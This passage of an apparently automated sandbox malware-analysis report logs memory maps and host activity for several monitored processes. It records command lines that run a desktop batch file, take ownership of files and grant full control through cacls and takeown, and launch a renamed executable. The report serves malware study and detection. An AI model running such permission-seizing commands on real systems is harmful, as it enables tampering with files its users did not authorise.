- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00e50000 | 0x01186fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e0f0000 | 0x7e0f0000 | 0x7e1effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e1f0000 | 0x7e1f0000 | 0x7e212fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e214000 | 0x7e214000 | 0x7e214fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e217000 | 0x7e217000 | 0x7e217fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e21a000 | 0x7e21a000 | 0x7e21cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e21d000 | 0x7e21d000 | 0x7e21ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (150)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
20 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
71 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
8 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 47 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 208, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x94c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xc68, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (41)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
4 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "wabmig.exe" |
|
1 |
Process #128: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #128 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "Workflow.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:53, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3f0 |
| Parent PID | 0xec4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
394
0x
E3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000a20000 | 0x00a20000 | 0x00a3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x00a2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a43fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00a63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00baffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00bb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00bd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00dbffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00dc0000 | 0x00e7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00f80000 | 0x012b6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007faf0000 | 0x7faf0000 | 0x7fbeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fbf0000 | 0x7fbf0000 | 0x7fc12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fc17000 | 0x7fc17000 | 0x7fc17fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc19000 | 0x7fc19000 | 0x7fc1bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc1c000 | 0x7fc1c000 | 0x7fc1cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc1d000 | 0x7fc1d000 | 0x7fc1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x6b4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #129: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #129 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:51, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfbc |
| Parent PID | 0x5c0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
70C
0x
82C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000530000 | 0x00530000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x0053ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00543fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00551fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00553fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00573fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00603fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00610fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x00621fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x006b0000 | 0x006b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006f0000 | 0x007adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000970000 | 0x00970000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04d80000 | 0x050b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007edf0000 | 0x7edf0000 | 0x7eeeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eef0000 | 0x7eef0000 | 0x7ef12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef14000 | 0x7ef14000 | 0x7ef14fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef17000 | 0x7ef17000 | 0x7ef19fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef1a000 | 0x7ef1a000 | 0x7ef1afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef1d000 | 0x7ef1d000 | 0x7ef1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #130: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #130 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "Workflow.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:52, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6b4 |
| Parent PID | 0x3f0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FEC
0x
584
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x005a0000 | 0x005c9fff | Memory Mapped File | r |
|
